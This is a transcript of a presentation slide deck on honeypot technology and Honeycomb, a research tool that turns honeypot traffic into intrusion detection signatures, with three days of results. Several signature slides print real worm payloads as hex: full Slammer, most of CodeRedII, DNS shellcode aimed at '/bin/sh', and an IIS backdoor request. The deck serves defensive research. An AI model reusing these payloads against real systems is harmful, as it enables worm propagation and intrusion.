Presentation is loading. Please wait.

Presentation is loading. Please wait.

Honeycomb and the current state of Honeypot Technology Christian Kreibich.

Published byBuck Williamson Modified over 9 years ago

Similar presentations

Presentation on theme: "Honeycomb and the current state of Honeypot Technology Christian Kreibich."— Presentation transcript:

1 christian.kreibich@cl.cam.ac.uk Honeycomb and the current state of Honeypot Technology Christian Kreibich

2 Coming up...  Introduction to Honeypots  Current state of the art: Honeynets  Honeycomb - automated NIDS signature creation  Three days in the life of an unprotected cable modem connection

3 So what’s a Honeypot?  “A Honeypot is a computer resource set up for the purpose of monitoring and logging the activities of entities that probe, attack or compromise it.” (My attempt on honeypots@securityfocus.com )  No production value, should see no traffic.  Interaction with these systems likely malicious.  Flexible concept, not a fixed tool.  Not new: Coockoo’s Egg, Evening with Berferd

4 Types of Honeypots  Low interaction:  Trap files, database entries etc (“Honeytokens”)  Emulated services and operating systems  Easier to deploy, limited capabilities.  High interaction:  Runs real systems  Need to limit harm that can be done  More to learn, more complexity, more risk!

5 Low interaction: fake services  From a fake FTP server shell script: case $command in QUIT* ) echo -e "221 Goodbye.\r" exit 0;; SYST* ) echo -e "215 UNIX Type: L8\r" ;; HELP* ) echo -e "214-The following commands are recognized (* =>'s unimplemented).\r" echo -e " USER PORT STOR MSAM* RNTO NLST MKD CDUP\r" echo -e " PASS PASV APPE MRSQ* ABOR SITE XMKD XCUP\r" echo -e " ACCT* TYPE MLFL* MRCP* DELE SYST RMD STOU\r" echo -e " SMNT* STRU MAIL* ALLO CWD STAT XRMD SIZE\r" echo -e " REIN* MODE MSND* REST XCWD HELP PWD MDTM\r" echo -e " QUIT RETR MSOM* RNFR LIST NOOP XPWD\r" echo -e "214 Direct comments to ftp@$domain.\r" ;;

6 High interaction: Honeynets Production Network Honeypots Internet  Gen II Honeynet

7 High interaction: Honeynets Production Network Honeypots Internet  Gen II Honeynet  Honeywall  Layer 2 bridge  IDS Gateway  iptables  snort_inline  Control & Report interface

8 snort_inline  drop tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh";  alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace:"|0000 E8D7 FFFFFF|/ben/sh";)

9 High interaction: Honeynets  Gen II Honeynet Production Network Honeypots Internet  Sebek2  Surveillance “rootkit”  Kernel module  Captures all activity on pots  Sends details to Honeywall  Prevents sniffing of its traffic  Sebeksniff

10 Honey Inspector

11 Honeycomb  Goal: automated generation of NIDS signatures  Name? Nice double meaning...

12 Honeycomb  Goal: automated generation of NIDS signatures  Name? Nice double meaning...  Combing for patterns in Honeypot traffic

13 Honeycomb’s Architecture

14 Honeycomb’s Algorithm

15 Pattern Detection (I)  Stream reassembly:

16 Pattern Detection (II)  Longest-common-substring (LCS) on pairs of messages: fetaramasalatapatata insalataramoussaka  Can be done in O(|m 1 | + |m 2 |) using suffix trees  Implemented libstree, generic suffix tree library  No hardcoding of protocol-specific knowledge

17 Pattern Detection (II)  Longest-common-substring (LCS) on pairs of messages: fetaramasalatapatata insalataramoussaka  Can be done in O(|m 1 | + |m 2 |) using suffix trees  Implemented libstree, generic suffix tree library  No hardcoding of protocol-specific knowledge

18 Pattern Detection (III)  Horizontal detection:  LCS on pairs of messages  each message independent  e.g. (persistent) HTTP

19 Pattern Detection (IV)  Vertical detection:  concatenates incoming messages  LCS on pairs of strings  for interactive flows and to mask TCP dynamics  e.g. FTP, Telnet,...

20 Signature Pool  Limited-size queue of current signatures  Relational operators on signatures:  sig 1 = sig 2 : all elements equal  sig 1  sig 2 : sig 1 contains subset of sig 2 ’s facts  sig new = sig pool : sig new ignored  sig new  sig pool : sig new added  sig pool  sig new : sig new augments sig pool  Signature correlation on destination ports  Avoids duplicates for trivial flows (portscan!)

21 Results  We ran Honeycomb on an unfiltered cable modem connection  Honeyd setup: fake FTP, Telnet, SMTP, Apache services, all Perl/Shell scripts.  Three day period  Some statistics:  649 TCP connections, 123 UDP connections  143 Pings, almost exclusively UDP port 137 (NetBIOS)  Full traffic volume: ~1MB  No wide-range portscanning

22 TCP Connections HTTP Kuang2 Virus/Trojan NetBIOS - W32/Deluder Worm NetBIOS - open shares Microsoft SQL Server

23 UDP Connections NetBIOS Nameservice Messenger Service Slammer

24 Signatures created: Slammer  1434/UDP worm, Microsoft SQL Server buffer overflow  Honeyd log:  2003-05-08-02:26:43.0385 udp(17) S 81.89.64.111 2943 192.168.169.2 1434 2003-05-08-02:27:43.0404 udp(17) E 81.89.64.111 2943 192.168.169.2 1434: 376 0 2003-05-08-09:58:38.0807 udp(17) S 216.164.19.162 1639 192.168.169.2 1434 2003-05-08-09:59:38.0813 udp(17) E 216.164.19.162 1639 192.168.169.2 1434: 376 0 2003-05-08-17:15:24.0072 udp(17) S 66.28.200.226 6745 192.168.169.2 1434 2003-05-08-17:16:24.0083 udp(17) E 66.28.200.226 6745 192.168.169.2 1434: 376 0  Signature:  alert udp any any -> 192.168.169.2/32 1434 (msg: "Honeycomb Thu May 8 09h58m38 2003 "; content: "|04 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 DC C9 B0|B|EB 0E 01 01 01 01 01 01 01|p|AE|B|01|p|AE|B|90 90 90 90 90 90 90 90|h|DC C9 B0|B|B8 01 01 01 01|1|C9 B1 18|P|E2 FD|5|01 01 01 05|P|89E5|Qh.dllhel32hkernQhounthickChGetTf|B9|llQh32.dhws2 f|B9|etQhsockf|B9|toQhsend|BE 18 10 AE|B|8D|E|D4|P|FF 16|P|8D|E|E0|P|8D|E|F0|P|FF 16|P|BE 10 10 AE|B|8B 1E 8B 03|=U|8B EC|Qt|05 BE 1C 10 AE|B|FF 16 FF D0|1|C9|QQP|81 F1 03 01 04 9B 81 F1 01 01 01 01|Q|8D|E|CC|P|8B|E|C0|P|FF 16|j|11|j|02|j|02 FF D0|P|8D|E|C4|P|8B|E|C0|P|FF 16 89 C6 09 DB 81 F3|<a|D9 FF 8B|E|B4 8D 0C|@|8D 14 88 C1 E2 04 01 C2 C1 E2 08|)|C2 8D 04 90 01 D8 89|E|B4|j|10 8D|E|B0|P1|C9|Qf|81 F1|x|01|Q|8D|E|03|P|8B|E|AC|P|FF D6 EB|"; )  Full worm detected

25 Signatures created: CodeRedII  80/TCP worm, Microsoft IIS Buffer Overflow  Hit more than a dozen times  alert tcp 80.0.0.0/8 any -> 192.168.169.2/32 80 (msg: "Honeycomb Tue May 6 11h55m20 2003 "; flags: A; flow: established; content: "GET /default.ida?XXXXXXXXXXXXXXXXXXXXX  XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90 90%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00= a HTTP/1.0|0D 0A|Content-type: text/xml|0A|Content-length: 3379 |0D 0A 0D 0A C8 C8 01 00|`|E8 03 00 00 00 CC EB FE|dg|FF|6|00 00|dg|89|&|00 00 E8 DF 02 00 00|h|04 01 00 00 8D 85|\|FE FF FF|P|FF|U|9C 8D 85|\|FE FF FF|P|FF|U|98 8B|@|10 8B 08 89 8D|X|FE FF FF FF|U|E4|=|04 04 00 00 0F 94 C1|=|04 08 00 00 0F 94 C5 0A CD 0F B6 C9 89 8D|T|FE FF FF 8B|u|08 81|~0|9A 02 00 00 0F 84 C4 00 00 00 C7|F0|9A 02 00 00 E8 0A 00 00 00|CodeRedII|00 8B 1C|$|FF|U|D8|f|0B C0 0F 95 85|8|FE FF FF C7 85|P|FE FF FF 01 00 00 00|j|00 8D 85|P|FE FF FF|P|8D 85|8|FE FF FF|P|8B|E|08 FF|p|08 FF 90 84 00 00 00 80 BD|8|FE FF FF 01|thS|FF|U|D4 FF|U|EC 01|E|84|i|BD|T|FE FF FF|,|01 00 00 81 C7|,|01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 89|F4|8D|E|88|Pj|00 FF|u|08 E8 05 00 00 00 E9 01 FF FF FF|j|00|j|00 FF|U|F0|P|FF|U|D0|Ou|D2 E8|;|05 00 00|i|BD|T|FE FF FF 00|\&|05 81 C7 00|\&|05|W|FF|U|E8|j|00|j|16 FF|U|8C|j|FF FF|U|E8 EB F9 8B|F4)E|84|jd|FF|U|E8 8D 85| |FE FF FF 83 F8 0A|s|C3|f|C7 85|p|FF FF FF 02 00|f|C7 85|r|FF FF …  Full worm, due to vertical detection – server replies before all packets seen!

26 Signatures detected: others …  alert tcp 64.201.104.2/32 any -> 192.168.169.2/32 1080,3128,4588,6588,8080 (msg: "Honeycomb Mon May 5 19h04m12 2003 "; flags: S; flow: stateless; )  Lookup: 2.104.201.64.in-addr-arpa domain name pointer for.information.see.proxyprotector.com

27 Signatures detected: others …  alert tcp 64.201.104.2/32 any -> 192.168.169.2/32 1080,3128,4588,6588,8080 (msg: "Honeycomb Mon May 5 19h04m12 2003 "; flags: S; flow: stateless; )  Lookup: 2.104.201.64.in-addr-arpa domain naime pointer for.information.see.proxyprotector.com  alert udp 81.152.239.141/32 any -> 192.168.169.2/32 135 (msg: "Honeycomb Thu May 8 12h57m51 2003 "; content: "|15 00 00 00 00 00 00 00 15 00 00 00|YOUR EXTRA PAYCHEQUE|00 E1 04|x|0C 00 00 00 00 00 00 00 0C 00 00 00|80.4.124.41|00|#|01 00 00 00 00 00 00|#|01 00 00| Amazing Internet Product Sells Itself!|0D 0A|Resellers Wanted! GO TO..... www.Now4U2.co.uk"; )

28 Signatures detected: others …  alert tcp 64.201.104.2/32 any -> 192.168.169.2/32 1080,3128,4588,6588,8080 (msg: "Honeycomb Mon May 5 19h04m12 2003 "; flags: S; flow: stateless; )  Lookup: 2.104.201.64.in-addr-arpa domain naime pointer for.information.see.proxyprotector.com  alert udp 81.152.239.141/32 any -> 192.168.169.2/32 135 (msg: "Honeycomb Thu May 8 12h57m51 2003 "; content: "|15 00 00 00 00 00 00 00 15 00 00 00|YOUR EXTRA PAYCHEQUE|00 E1 04|x|0C 00 00 00 00 00 00 00 0C 00 00 00|80.4.124.41|00|#|01 00 00 00 00 00 00|#|01 00 00| Amazing Internet Product Sells Itself!|0D 0A|Resellers Wanted! GO TO..... www.Now4U2.co.uk"; )  135/UDP lets you pop up spam^H^H^H^H Internet Advertisements on other Windows machines via Messenger Service

29 Signatures detected: others …  alert tcp 64.201.104.2/32 any -> 192.168.169.2/32 1080,3128,4588,6588,8080 (msg: "Honeycomb Mon May 5 19h04m12 2003 "; flags: S; flow: stateless; )  Lookup: 2.104.201.64.in-addr-arpa domain naime pointer for.information.see.proxyprotector.com  alert udp 81.152.239.141/32 any -> 192.168.169.2/32 135 (msg: "Honeycomb Thu May 8 12h57m51 2003 "; content: "|15 00 00 00 00 00 00 00 15 00 00 00|YOUR EXTRA PAYCHEQUE|00 E1 04|x|0C 00 00 00 00 00 00 00 0C 00 00 00|80.4.124.41|00|#|01 00 00 00 00 00 00|#|01 00 00| Amazing Internet Product Sells Itself!|0D 0A|Resellers Wanted! GO TO..... www.Now4U2.co.uk"; )  135/UDP lets you pop up spam^H^H^H^H Internet Advertisements on other Windows machines via Messenger Service  alert tcp 80.4.218.53/32 any -> 192.168.169.2/32 80 (msg: "Honeycomb Thu May 8 07h27m33 2003 "; flags: PA; flow: established; content: "GET /scripts/root.exe?/c+dir HTTP/1.0|0D 0A|Host: www|0D 0A|Connnection: close|0D 0A 0D|"; )

30 Summary  System detects patterns in network traffic  Good at worm detection – if not polymorphic!  Approach still simplistic – approximate matching?  TODO list  Reasonable setup  Performance evaluation  Better signature reporting scheme  Log processing suite  Closer integration with honeyd

31 Thanks!  Shoutouts: a13x hØ && 1ance  No machines were harmed or compromised in the making of this presentation.  honeypots@securityfocus.com  Questions?

Download ppt "Honeycomb and the current state of Honeypot Technology Christian Kreibich."

Similar presentations

HONEYPOTS Mathew Benwell, Sunee Holland, Grant Pannell.

HONEYPOTS Mathew Benwell, Sunee Holland, Grant Pannell.
Firewall Simulation Teaching Information Security Using: Visualization Tools, Case Studies, and Hands-on Exercises May 23, 2012.

Firewall Simulation Teaching Information Security Using: Visualization Tools, Case Studies, and Hands-on Exercises May 23, 2012.
Greg Williams CS691 Summer 2011. Honeycomb  Introduction  Preceding Work  Important Points  Analysis  Future Work.

Greg Williams CS691 Summer Honeycomb  Introduction  Preceding Work  Important Points  Analysis  Future Work.
Honey Pots: Natures Dessert or Cyber Defense Tool? Eric Richardson.

Honey Pots: Natures Dessert or Cyber Defense Tool? Eric Richardson.
The Honeynet Project Advancements in Honeypot Tools.

The Honeynet Project Advancements in Honeypot Tools.
Firewalls and Intrusion Detection Systems

Firewalls and Intrusion Detection Systems
Honeypots, Honeynets, and the Honeywall David Dittrich The Information School/C&C The University of Washington ARO Information Assurance Workshop 3 March.

Honeypots, Honeynets, and the Honeywall David Dittrich The Information School/C&C The University of Washington ARO Information Assurance Workshop 3 March.
Snort - an network intrusion prevention and detection system Student: Yue Jiang Professor: Dr. Bojan Cukic CS665 class presentation.

Snort - an network intrusion prevention and detection system Student: Yue Jiang Professor: Dr. Bojan Cukic CS665 class presentation.
2: Application Layer1 ECE5650 FTP, Email, DNS, and P2P.

2: Application Layer1 ECE5650 FTP, , DNS, and P2P.
1 Host Based Intrusion Detection: Analyzing System Logs Bob Winding, Vikram Ahmed University of Notre Dame 12/13/2006.

1 Host Based Intrusion Detection: Analyzing System Logs Bob Winding, Vikram Ahmed University of Notre Dame 12/13/2006.
Honeywall CD-ROM. Developers and Speakers  Dave Dittrich University of Washington  Rob McMillen USMC  Jeff Nathan Sygate  William Salusky AOL.

Honeywall CD-ROM. Developers and Speakers  Dave Dittrich University of Washington  Rob McMillen USMC  Jeff Nathan Sygate  William Salusky AOL.
IT Security Doug Brown Jeff Bollinger. What is security? P.H.P. People Have Problems Security is the mitigation and remediation of human error in information.

IT Security Doug Brown Jeff Bollinger. What is security? P.H.P. People Have Problems Security is the mitigation and remediation of human error in information.
Revising Riverbot Outline and Specifications Christian Skalka.

Revising Riverbot Outline and Specifications Christian Skalka.
FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. 6 Packet Filtering By Whitman, Mattord, & Austin© 2008 Course Technology.

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. 6 Packet Filtering By Whitman, Mattord, & Austin© 2008 Course Technology.
Honeywall CD-ROM. 2 Developers and Speakers  Dave Dittrich University of Washington  Rob McMillen USMC  Jeff Nathan Sygate  William Salusky AOL.

Honeywall CD-ROM. 2 Developers and Speakers  Dave Dittrich University of Washington  Rob McMillen USMC  Jeff Nathan Sygate  William Salusky AOL.
COEN 252: Computer Forensics Router Investigation.

COEN 252: Computer Forensics Router Investigation.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.0 Application Layer Functionality and Protocols Network Fundamentals – Chapter.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.0 Application Layer Functionality and Protocols Network Fundamentals – Chapter.
Intrusion Detection - Arun Hodigere. Intrusion and Intrusion Detection Intrusion : Attempting to break into or misuse your system. Intruders may be from.

Intrusion Detection - Arun Hodigere. Intrusion and Intrusion Detection Intrusion : Attempting to break into or misuse your system. Intruders may be from.
1 Introduction to Honeypot, Denial-of- Service, and Rootkit Cliff C. Zou CAP6135 Spring, 2011.

1 Introduction to Honeypot, Denial-of- Service, and Rootkit Cliff C. Zou CAP6135 Spring, 2011.
Www.cuispa.org Fraudulent Site Take Down Guidance Author: John Brozycki, CISSP Hudson Valley FCU CUISPA Member Advisor LEGAL DISCLAIMER: This document.

Fraudulent Site Take Down Guidance Author: John Brozycki, CISSP Hudson Valley FCU CUISPA Member Advisor LEGAL DISCLAIMER: This document.

Similar presentations

Ads by Google